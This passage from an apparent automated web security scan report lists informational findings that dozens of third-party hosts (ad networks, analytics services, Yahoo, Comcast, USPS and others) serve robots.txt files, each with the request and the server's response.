Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.16. http://by.optimost.com/trial/471/p/customerhomepage.58a/57/content.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://by.optimost.com
Path:   /trial/471/p/customerhomepage.58a/57/content.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3615671944"
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Content-Length: 26
Server: Fast
Expires: Tue, 06 Sep 2011 11:58:57 GMT
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:58:57 GMT
Connection: close

User-agent: *
Disallow: /

22.17. http://cdn.optmd.com/V2/80181/197812/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/80181/197812/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 06 Sep 2011 12:45:57 GMT
Connection: close

User-agent: *
Disallow: /

22.18. http://cdn.turn.com/server/ddc.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Tue, 06 Sep 2011 12:44:56 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

22.19. http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1/s93230034164153

Summary

Severity:   Information
Confidence:   Certain
Host:   http://citizenstelecom.112.2o7.net
Path:   /b/ss/cznfrontier/1/H.22.1/s93230034164153

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: citizenstelecom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:44 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "115248-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.20. http://comcast-www.baynote.net/baynote/tags3/common

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: comcast-www.baynote.net

Response

HTTP/1.1 200 OK
Server: BNServer
Accept-Ranges: bytes
ETag: W/"216-1315309802000"
Last-Modified: Tue, 06 Sep 2011 11:50:02 GMT
Content-Type: text/plain
Content-Length: 216
Date: Tue, 06 Sep 2011 12:22:13 GMT
Connection: close

User-agent: *
Disallow: /baynote/
Disallow: /error400.html
Disallow: /error403.html
Disallow: /error404.html
Disallow: /error500.html
Disallow: /index.jsp
Disallow: /search/
Disallow: /socialsearch/
D
...[SNIP]...

22.21. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: comcastresidentialservices.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:22:15 GMT
Accept-Ranges: bytes
ETag: W/"25-1309299047000"
Connection: close
Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT
Content-Length: 25

User-agent: *
Disallow: /

22.22. http://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ec.atdmt.com
Path:   /ds/TRATR11234001/300x100/multipolicy_300x100.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ec.atdmt.com

Response

HTTP/1.0 200 OK
Expires: Tue, 13 Sep 2011 12:48:17 GMT
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/plain
Content-Length: 68
Allow: GET
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

22.23. http://ehg-verizon.hitbox.com/HG

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-verizon.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-verizon.hitbox.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:54 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Tue, 06 Sep 2011 12:50:54 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic

22.24. http://espanol.vonage.com/mpel.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://espanol.vonage.com
Path:   /mpel.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: espanol.vonage.com

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/plain
Last-Modified: Wed, 03 Feb 2010 20:08:10 GMT
Accept-Ranges: bytes
ETag: "0f1779bca5ca1:3746"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:15 GMT
Connection: close

User-agent: *
Disallow: /img/
Disallow: /lib/
Disallow: /pages/

22.25. http://event.rtrk.com/event/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://event.rtrk.com
Path:   /event/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: event.rtrk.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 26
Keep-Alive: timeout=12, max=68
Connection: Keep-Alive
Content-Type: text/plain
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:10 GMT;path=/;httponly

User-agent: *
Disallow: /

22.26. http://finance.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: finance.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 02 Dec 2010 23:04:54 GMT
Accept-Ranges: bytes
Content-Length: 85
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.20.7

User-agent: *
Disallow: /print/
Sitemap: http://finance.yahoo.com/seo_sm_finance_xml

22.27. http://fonts.googleapis.com/css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fonts.googleapis.com
Path:   /css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fonts.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 11:51:55 GMT
Expires: Tue, 06 Sep 2011 11:51:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

22.28. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.comcast.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Last-Modified: Wed, 03 Aug 2011 09:11:43 GMT
ETag: "53288ef2-19f-4a99640c867f8"
Accept-Ranges: bytes
Content-Length: 415
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# Default Generated robots.txt file
User-agent: *
Crawl-delay: 5
Disallow: /t5/forums/forumtopicprintpage
Disallow: /t5/ideas/ideaprintpage
Disallow: /t5/blogs/blogarticleprintpage
Disallow: /t5/help
...[SNIP]...

22.29. http://frontier.com/winwin1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: frontier.com

Response

HTTP/1.1 200 OK
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:526"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 11:50:40 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /

22.30. http://g-pixel.invitemedia.com/gmatcher

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:24:25 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.31. http://games.frontier.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: games.frontier.com

Response

HTTP/1.0 200 OK
Content-Length: 409
Content-Type: txt
Last-Modified: Tue, 21 Jul 2009 12:04:36 GMT
Accept-Ranges: bytes
ETag: "022666afb9ca1:8f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:45:51 GMT
Connection: close

User-agent: Mediapartners-Google
Disallow:

User-agent: YahooYSMcm
Disallow:

User-agent: Googlebot
Disallow: /channels/wizard/
Disallow: /checkout/
Disallow: /membership/
Disallow: /profil
...[SNIP]...

22.32. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: global.ard.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:31 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

22.33. https://go.ooma.com/activate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.ooma.com
Path:   /activate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.ooma.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:27 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 19:24:49 GMT
ETag: "da3e-cc-2de98240"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

22.34. http://gws.maps.yahoo.com/MapImage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gws.maps.yahoo.com
Path:   /MapImage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gws.maps.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Yahoo-Serving-Host: gws30.maps.sp1.yahoo.com
Last-Modified: Sat, 05 Dec 2009 08:01:33 GMT
Accept-Ranges: bytes
Content-Length: 27
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-Agent: *
Disallow: /

22.35. http://iar.worthathousandwords.com/iar.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://iar.worthathousandwords.com
Path:   /iar.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: iar.worthathousandwords.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Mon, 30 Jan 2006 17:23:57 GMT
Accept-Ranges: bytes
ETag: "5876b6f3c125c61:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:41:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

22.36. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:55:56 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

22.37. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: int.teracent.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1310682020000"
Last-Modified: Thu, 14 Jul 2011 22:20:20 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:44:43 GMT
Connection: close

User-agent: *
Disallow: /

22.38. http://integrate.112.2o7.net/dfa_echo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://integrate.112.2o7.net
Path:   /dfa_echo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:43 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "25545d-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www98
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.39. http://ips-invite.iperceptions.com/webValidator.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ips-invite.iperceptions.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:23 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

22.40. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: landing.optionshouse.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:15 GMT
Connection: close
Content-Length: 82

Sitemap: http://landing.optionshouse.com/sitemap.xml

User-agent: *
Allow: /

22.41. https://login.aptela.com/cgi/login.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.aptela.com
Path:   /cgi/login.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.aptela.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Sun, 01 Nov 2009 21:31:08 GMT
ETag: "30000799-1a-47755faa6bf00"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

22.42. https://login.comcast.net/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.comcast.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:41 GMT
Server: Apache
Last-Modified: Tue, 30 Aug 2011 14:39:35 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=492
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.43. http://metrics.scottrade.com/b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.scottrade.com
Path:   /b/ss/scottradecom,scottradeglobal/1/H.22.1/s98473441649693

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.scottrade.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:47 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "299153-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www39
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.44. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.vonage.com
Path:   /b/ss/vonagevonagecomsubscribeprod/1/H.21/s95377543827053

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "386f56-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.45. http://movies.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: movies.yahoo.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 12:07:20 GMT
Content-Length: 70
Accept-Ranges: bytes
Last-Modified: Thu, 14 Jul 2011 09:21:47 GMT
Etag: "YM:1:2ce9a88e-0e0a-496b-83b2-3ae576312874"
Cache-Control: max-age=180, public
Expires:
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 2258
Via: HTTP/1.1 web16.usw7.mobstor.s2e.yahoo.com (YahooTrafficServer/1.19.8 [c sNf ])
Server: YTS/1.20.5
x-ysws-request-id: 618e0a9d-abd0-49a6-821c-b2e33e11d331

User-agent: *
Disallow:
Sitemap: http://movies.yahoo.com/sitemap.xml

22.46. http://music.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: music.yahoo.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 202
Content-Type: text/plain
Last-Modified: Fri, 21 Sep 2007 22:37:21 GMT
Accept-Ranges: bytes
ETag: "e7892f99ffcc71:16afec"
Server: Microsoft-IIS/6.0
Date: Tue, 06 Sep 2011 12:45:07 GMT
Connection: close

# Robots exclusions file for music.yahoo.com

User-agent: *
Disallow: /rss/
Disallow: /library/
Disallow: /videos/*/top/*
Disallow: /videos/*s=*
Disallow: /vidoes/*page=1*
Disallow: /launchcas
...[SNIP]...

22.47. http://new.music.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://new.music.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: new.music.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 22 Aug 2011 13:09:31 GMT
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8

# Robots exclusions file for new.music.yahoo.com

User-agent: *
Disallow: /rss/
Disallow: /library/
Disallow: /videos/*/top/*
Disallow: /videos/*s=*
Disallow: /vidoes/*page=1*
Disallow: /searc
...[SNIP]...

22.48. http://o.analytics.yahoo.com/fpc.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: o.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:01 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Tue, 21 Jun 2011 13:20:59 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

22.49. http://pagead2.googlesyndication.com/pagead/imgad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 06 Sep 2011 12:29:53 GMT
Expires: Wed, 07 Sep 2011 12:29:53 GMT
Cache-Control: public, max-age=86400
Server: cafe
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.50. http://pixel.everesttech.net/2565/i

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.everesttech.net
Path:   /2565/i

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.everesttech.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:10 GMT
Server: Apache
Vary: X-EF-Forwarded-For
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "1b883b-23-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 35
Keep-Alive: timeout=15, max=999865
Connection: Keep-Alive
Content-Type: text/plain

User-agent: Googlebot
Disallow: /

22.51. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

22.52. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 06 Sep 2011 12:44:57 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.53. http://pixel.quantserve.com/api/segments.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 07 Sep 2011 12:45:29 GMT
Content-Type: text/plain
Content-Length: 26
Date: Tue, 06 Sep 2011 12:45:29 GMT
Server: QS

User-agent: *
Disallow: /

22.54. http://postcalc.usps.gov/WebResource.axd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /WebResource.axd

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: postcalc.usps.gov

Response

HTTP/1.0 200 OK
Cteonnt-Length: 165
Content-Type: text/plain
Last-Modified: Fri, 08 Apr 2011 19:00:10 GMT
ETag: "019d02e1ff6cb1:119d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private, max-age=2608
Date: Tue, 06 Sep 2011 12:53:06 GMT
Content-Length: 165
Connection: close

# robots should not look for files with the extemsion .axd
# example: WebResource.axd and ScriptResource.axd

User-agent: *
Disallow: /*.axd$
Disallow: /*.ashx$

22.55. http://r.casalemedia.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Tue, 06 Sep 2011 11:59:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 11:59:04 GMT
Connection: close

User-agent: *
Disallow: /

22.56. http://realestate.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.yahoo.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: realestate.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 17 Jun 2011 07:06:48 GMT
Accept-Ranges: bytes
Content-Length: 121
Vary: Accept-Encoding
Connection: close
